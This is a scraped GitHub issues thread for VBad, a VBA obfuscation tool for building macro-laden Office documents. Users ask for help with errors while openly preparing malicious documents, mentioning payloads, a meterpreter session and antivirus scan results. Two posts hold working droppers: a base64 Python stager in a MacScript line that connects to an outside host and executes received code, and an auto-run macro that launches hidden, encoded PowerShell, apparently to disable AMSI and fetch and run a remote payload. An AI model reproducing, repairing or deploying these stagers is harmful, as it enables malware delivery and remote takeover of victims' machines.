pepitoh / vbad Goto Github PK

Hi guys, thanks for putting this project up!

Trying to run it for the first time. MS Office 2010, Python 2.7, win32com. Trusted VBA is on.

The default project in c:\tmp throws this error:

Can't create vba module tmp, check if your template file is not modifiy or if you module name is ok, or if VBA Project object model..

Any ideas how to cure it? Thanks!

When i try to laucnh VBad script i get a syntax error as shown below

how to install win32com ?

i create a tmp file in C: and put the VBAD-master in it ...
i have python 27 and pywin32
but i dont now what is the right command to wright in cmd to open VBad ?

Nice tool

Well, before even beginning to play around it, the program shuts down with this error:
Traceback (most recent call last):
File "F:\DOSSIER\Github\VBad\VBad.py", line 170, in
if name == "main": main()
File "F:\DOSSIER\Github\VBad\VBad.py", line 49, in main
file_type = return_file_type(template_file)
File "F:\DOSSIER\Github\VBad\VBad.py", line 11, in return_file_type
raise Info(template_file + " was not found.", 0)
Info
I just try to launch VBad after downloading it...
What did I did wrong ?

I kept getting this error. What does it mean?

I checked, the "Trust VBA Project object model" is on, there is no special char in function name... And a few questions:

1. Why do we need a template doc file? Can we just obfuscate the vbs file and I can copy the code to the file I want (docm)? I wasn't sure what the template doc for so I create a blank doc. Could it be the problem?
2. Is there a way to let the script automatically obfuscate every code in the target vbs file? I want to skip adding [] markdown as it is quite a lot of work for long vbs.
3. following #2, does "trigger_function_name" mean everything after such function will be obfuscated? "After" is in the sense of code location in vbs?

Thanks!

when trying to enable macros in the generated files i get the error "compilation error Ambiguous name detected"
also how should i structure my vba script, when using my current vba (to obscure) i get the error "The trigger function name Test has not been found in the vba, triggering point cannot be set"

thanks

Hi,

VBad works for me, my macro code still executes correctly in the generated doc when I open it the first time.

However even if setting delete_module_name = 0, the macro code seems to be hidden and I can't view/edit the obfuscated code in Word, so I can't inspect/tweak what VBad is generating

Any workaround for this?

hi i create macro but when i perform it display error run-time error -2146697211(800c0005) "the system cannot locate the resource specified"
and when debug it display "microsoft word has stopped working"

After generate the files, this message popups when i open the .doc

upload the vbas and the const.py
const.py.txt
orignal_vba.txt
original_vba_prepared.txt

Please help me.
Thanks in advice

Hi,
I was checking your work (which looks amazing btw), but I can't make it work with the example files or some custom ones.
See the following:

If you have any idea on what I could do to make this work, it would be much appreciated!

Thanks
JM

I Have a lot of trouble with this tool and see in Issues that im not alone
it's sad that the guy who create it dont give more info about it..
there is no info where to start , how to create a full obfuscate ..and more
So it have no point to put a tool here that not work !

Hi,

I noticed an issue. Don't know if it's related to VBad or MS Word itself. I prepared my "malicious" doc and it fires the payload only once. When I open it 2nd time nothing happens. I need to rebuild it with VBad and it works again, but still only once. I'm using Windows 7 32bit with MS Word 2013 and Python 2.7.

Let me know if you have any idea what's the matter.

Regards

Firstly, very cool project! Thankyou.

Would I be able to markup my code for obfuscation such that the code will still function as normal before obfuscation? I am interested in how I could integrate this into my workflow. I would like to have the code permanently marked up so I don't have to repeat the fairly significant effort for each release (I like to release often). It doesn't seem possible with the current markup scheme described in the README.

Hi, getting an error I was hoping to get some help with. I am using Office2007, and I know it is not tested against that, but I wanted to try, as this is the clients office version. I have enabled all of the macro allow settings and the trust center.
The error is below. Any ideas?
(I am a very poor scripter!)

[+] .doc detected
[+] Valid filename_list, 3 .doc will be generated
[+] C:\tmp\VBad\Example\Orignal_VBA\original_vba_prepared.vbs will be obfuscated and integrated in created documents
[+] Creating Extra_order_promo.doc
[+] XOR encrypton was selected
[+] Randomizing variable and function names
[+] Randomized trigger function name : ZMIsbnxMTmvTPEZ
[+] Obfuscation of strings
[+] Hiding strings from python script
Traceback (most recent call last):
File "c:\tmp\VBad\VBad.py", line 170, in
if name == "main": main()
File "c:\tmp\VBad\VBad.py", line 88, in main
Office_container.Open(template_file)
File "c:\tmp\VBad\inc\classes.py", line 150, in Open
self.Close()
File "c:\tmp\VBad\inc\classes.py", line 241, in Close
self.doc.Close(SaveChanges=0)
AttributeError: WordObject instance has no attribute 'doc'

i've been getting a syntax error for the following line, what could be the problem?
MacScript "do shell script ""echo "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCdwaWUzMi5tb29vLmNvbScsMTMzNykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))" >> $HOME/.hidden/connect.py/"""

Hello and thank you for this awesome tool. It seems that i have stuck somewhere or i am doing something wrong. I have been trying to encrypt this auto generated macro script
VBA_original.txt
by preparing it like this.
VBA_prepared.txt
However despite the success,

the resulted script looks like this
VBA_result.txt
with a compiling error.

So what am i missing here or doing wrong?

hi
I dont khnow use this tool
films about this not perfect
please help me

I get this error on my windows command prompt. "The Trigger Function name has not been found in the vba, trigger point cannot be set." I dont know wat am doing wrong, as am just a beginner on Python. Any help please. Attached screenshot of the error.

I get this error on my windows command prompt. "The Trigger Function name has not been found in the vba, trigger point cannot be set." I dont know wat am doing wrong, as am just a beginner on Python. Any help please.

Thanks you

__     ______            _
\ \   / / __ )  __ _  __| |
 \ \ / /|  _ \ / _` |/ _` |
  \ V / | |_) | (_| | (_| |
   \_/  |____/ \__,_|\__,_|

        VBA Obfuscation Tools combined with an MS office document generator
        By @Pepitoh

When I try to create the macros in the generated files just that appears!

Hi,

First of all, thanks for you work, I discovered you tool by reading MISC :)

I have prepared my macro as suggested in the doc (cf demo_prepared.txt).
I have a randomized macro generated but in fact, it's not OK with syntax (cf demo_result.txt).
IMHO, it's because of "quote" inside the variable (it should break the detecting string regex) but I need them in the powershell command.
So my question is : how can I achieve what I want?

demo_result.txt

demo_prepared.txt

VBad isn't properly handling 2xdouble quotes (to escape them) in a string passed to WriteLine. Not sure what the issue is.

I've tried taking the 2xdouble quotes out, still no luck. For example:
fileOut.WriteLine "myURL=""http://the.earth.li/~sgtatham/putty/latest/w32/putty.exe"""
creates this:
myURL=""http://the.earth.li/~sgtatham/putty/latest/w32/putty.exe""

The only solution I can think of is having a seperate .Write to print one quote before and after each string... that sounds like a pain.

Hi, so i was editing the result document and it broke the macro, couldn't execute it even if i tried to directly run the macro it did nothing,

also .xls files aren't created

Hello,

Any suggestions ? :)

Thanks

http://nodistribute.com/result/DMNXkzbWmc4eAwR

When I launch "python VBad.py", I receive this error:

I precise that:

• All prerequisites have been installed
• I'm a beginner in Python, especially on Windows OS
• I'm assume that this error come from a misconfiguration on my side

Any help will be apreciated :-)

Hello i must say thanks for you great work on VBad, i need your assistance i don't know where i will add the function name "Test" in my script,

Error msg:

My script:
vba_prepared.txt

pepitoh can you show me where i can add the function name in my attached script. Thanks

No matter what type of macro it generates, it always gives me error of this type, which has not defined sub or fuction

The macro by itself if it works, osea I mean before obfuscating, but already when I put it inside the vbad, for nothing the world works, it is always the same error, already tried with several types of macros and it is always the same

Hello,

In the README, you should replace "Git clone and customize config.py" with "Git clone and customize const.py"

Hi,
Thanks for this great solution.

I get this error when running
ImportError: No module named win32com.client

Hello Pepitoh,

I would like to start off by saying, thank you for the awesome tool. I hope to be able to contribute to the project as I learn to improve my coding practice.

I am having an issue that I would like some guidance on. VBad...is doing exactly what it should. Everything is going find on that part. The trouble I am having is when I run the Macro. I am getting a compile error. I have gone back through the original code to do some "cleaning", but I am still getting the same compile error: expected end of statement. I thought maybe since it could have been a "" " " "" kind of an error. I looked to see if that was the case and corrected it, but I keep getting the same errors.

I have not changed a whole lot from your original code. I am looking more of a proof of concept that I can get it to work for myself. I have included all the files in the attachment.

4Pepitoh_No_VBad.doc- this document is the original Macro. When I run the Macro I get a meterpreter session no problem.

4Pepitoh.txt- this is the Macro I am using in a txt pad

original_vba_prepared_1.vbs - this is the script I was using with VBad. In this one, I did not use any mark downs on any of the strings.

original_vba_prepared_2.vbs - same as script above however, I marked down the strings on this one.

No_random_fucntions_Survey_2016.doc - This doc file has been embed with the output from VBad. I get an error on this document. This one does not have the strings marked down.

Randomization_Survey_2016.doc- This doc file has been embed with the output from VBad. I get an error on this document as well. On this one the strings have been marked down

Again any help, advice or tips you can give will be greatly appreciated.

Thank you for the tool.

telltell

original_vba_prepared_2.vbs.txt
No_random_fucntions_Survey_2016.docx
Radomization_Survey_2016.docx
4Pepitoh_No_VBad.docx
4Pepitoh.txt
original_vba_prepared_1.vbs.txt

http://nodistribute.com/result/bMDcKZIyVLOEpHiNad

my macro

Sub [rdm::21]AutoOpen()[!!]
[rdm::21]Debugging[!!]
End Sub

Sub [rdm::21]Document_Open()[!!]
[rdm::21]Debugging[!!]
End Sub

Public Function [rdm::21]Debugging()[!!] As Variant
Dim [rdm::21]Azh[!!]
[rdm::21]azh = "powershel"
[rdm::21]azh = azh +[!!] "l.exe -NoP -sta -NonI -W Hidden -Enc WwBS"
[rdm::21]azh = azh +[!!] "AEUAZgBdAC4AQQBTAFMARQBNAGIAbAB5AC4ARwBFAFQAVAB5AF"
[rdm::21]azh = azh +[!!] "AARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUA"
[rdm::21]azh = azh +[!!] "bgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQ"
[rdm::21]azh = azh +[!!] "B0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBH"
[rdm::21]azh = azh +[!!] "AGUAdABGAGkARQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAG"
[rdm::21]azh = azh +[!!] "EAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMA"
[rdm::21]azh = azh +[!!] "dABhAHQAaQBjACcAKQAuAFMAZQB0AFYAQQBsAHUAZQAoACQAbg"
[rdm::21]azh = azh +[!!] "B1AGwATAAsACQAVABSAFUARQApAH0AOwBbAFMAWQBzAHQARQBN"
[rdm::21]azh = azh +[!!] "AC4ATgBFAFQALgBTAGUAUgBWAGkAQwBlAFAAbwBJAG4AVABNAG"
[rdm::21]azh = azh +[!!] "EATgBhAEcARQBSAF0AOgA6AEUAWABQAEUAQwB0ADEAMAAwAEMA"
[rdm::21]azh = azh +[!!] "bwBuAHQASQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4AZQBXAC0ATw"
[rdm::21]azh = azh +[!!] "BiAEoARQBjAHQAIABTAHkAUwBUAEUATQAuAE4AZQB0AC4AVwBF"
[rdm::21]azh = azh +[!!] "AEIAQwBMAEkARQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAG"
[rdm::21]azh = azh +[!!] "EALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYA"
[rdm::21]azh = azh +[!!] "LgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALw"
[rdm::21]azh = azh +[!!] "A3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAg"
[rdm::21]azh = azh +[!!] "AEcAZQBjAGsAbwAnADsAJABXAGMALgBIAEUAYQBkAEUAcgBzAC"
[rdm::21]azh = azh +[!!] "4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQA"
[rdm::21]azh = azh +[!!] "dQApADsAJAB3AGMALgBQAHIAbwB4AFkAPQBbAFMAeQBTAHQAZQ"
[rdm::21]azh = azh +[!!] "BtAC4ATgBFAFQALgBXAEUAQgBSAEUAUQB1AEUAUwB0AF0AOgA6"
[rdm::21]azh = azh +[!!] "AEQARQBmAEEAdQBsAFQAVwBFAGIAUABSAE8AeABZADsAJAB3AG"
[rdm::21]azh = azh +[!!] "MALgBQAHIATwB4AFkALgBDAFIARQBkAEUATgBUAEkAYQBMAFMA"
[rdm::21]azh = azh +[!!] "IAA9ACAAWwBTAHkAUwB0AGUATQAuAE4AZQB0AC4AQwBSAEUARA"
[rdm::21]azh = azh +[!!] "BFAG4AVABJAGEATABDAEEAQwBIAGUAXQA6ADoARABlAGYAYQB1"
[rdm::21]azh = azh +[!!] "AEwAdABOAGUAVABXAE8AcgBrAEMAcgBlAEQARQBuAFQASQBBAE"
[rdm::21]azh = azh +[!!] "wAcwA7ACQASwA9AFsAUwB5AHMAVABFAE0ALgBUAGUAWAB0AC4A"
[rdm::21]azh = azh +[!!] "RQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQ"
[rdm::21]azh = azh +[!!] "B0AEIAWQB0AGUAcwAoACcAaAB5AFIARAA7AEoANwA6AD0AdgB8"
[rdm::21]azh = azh +[!!] "AGkAPwBPAFEAfQBCAEEATQBUADQAPgBqAFgAbwArAF0ALgA1AH"
[rdm::21]azh = azh +[!!] "MANgAlACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIA"
[rdm::21]azh = azh +[!!] "RwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQ"
[rdm::21]azh = azh +[!!] "B8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABL"
[rdm::21]azh = azh +[!!] "AFsAJABfACUAJABLAC4AQwBPAHUAbgBUAF0AKQAlADIANQA2AD"
[rdm::21]azh = azh +[!!] "sAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQA"
[rdm::21]azh = azh +[!!] "SgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQ"
[rdm::21]azh = azh +[!!] "AoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAk"
[rdm::21]azh = azh +[!!] "AFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsAC"
[rdm::21]azh = azh +[!!] "QAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkA"
[rdm::21]azh = azh +[!!] "XQA7ACQAXwAtAGIAWABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQ"
[rdm::21]azh = azh +[!!] "ArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBj"
[rdm::21]azh = azh +[!!] "AC4ASABFAGEARABFAFIAUwAuAEEARABkACgAIgBDAG8AbwBrAG"
[rdm::21]azh = azh +[!!] "kAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AbgBzAGcASAA2AEgA"
[rdm::21]azh = azh +[!!] "RQAyAHMAMABRAHoAYQBuADMAMgA1AEoASwBjADUAawBXADAAWQ"
[rdm::21]azh = azh +[!!] "B2ADgAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAv"
[rdm::21]azh = azh +[!!] "AG0AbQBzAG4AbQBpAGMAcgBvAHMAbwBmAHQALgBkAHUAYwBrAG"
[rdm::21]azh = azh +[!!] "QAbgBzAC4AbwByAGcAOgA4ADAAMQAnADsAJAB0AD0AJwAvAGEA"
[rdm::21]azh = azh +[!!] "ZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAZABhAHQAQQ"
[rdm::21]azh = azh +[!!] "A9ACQAVwBDAC4ARABPAFcATgBMAE8AYQBEAEQAYQB0AGEAKAAk"
[rdm::21]azh = azh +[!!] "AFMAZQBSACsAJABUACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbAD"
[rdm::21]azh = azh +[!!] "AALgAuADMAXQA7ACQARABBAFQAYQA9ACQAZABhAFQAYQBbADQA"
[rdm::21]azh = azh +[!!] "LgAuACQARABBAHQAYQAuAGwAZQBuAEcAVABoAF0AOwAtAGoAbw"
[rdm::21]azh = azh +[!!] "BpAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABh"
[rdm::21]azh = azh +[!!] "AFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
Const [rdm::21]HIDDEN_WINDOW = 0[!!]
Dim [rdm::21]azhComputer[!!]
Dim [rdm::21]objConfig[!!]
Dim [rdm::21]objProcess[!!]
Dim [rdm::21]objStartup[!!]
Dim [rdm::21]objWMIService[!!]
Dim [rdm::21]intProcessID[!!]
[rdm::21]azhComputer = "."[!!]
Set [rdm::21]objWMIService = GetObject("winmgmts:\" & azhComputer & "\root\cimv2")[!!]
Set [rdm::21]objStartup = objWMIService.Get("Win32_ProcessStartup")[!!]
Set [rdm::21]objConfig = objStartup.SpawnInstance_ [!!]
[rdm::21]objConfig.ShowWindow = HIDDEN_WINDOW[!!]
Set [rdm::21]objProcess = GetObject("winmgmts:\" & azhComputer & "\root\cimv2:Win32_Process")[!!]
[rdm::21]objProcess.Create azh, Null, objConfig, intProcessID[!!]
End Function

Avast is GOD!... hail avast haha

Is there anyway that I can just feed this VBS script? Or does the VBS script already need to be in a document? Also, I am getting
Traceback (most recent call last): File "VBad.py", line 3, in <module> import win32com.client, os ImportError: No module named win32com.client
every time I try to run it, even with using the default VBS script and word docs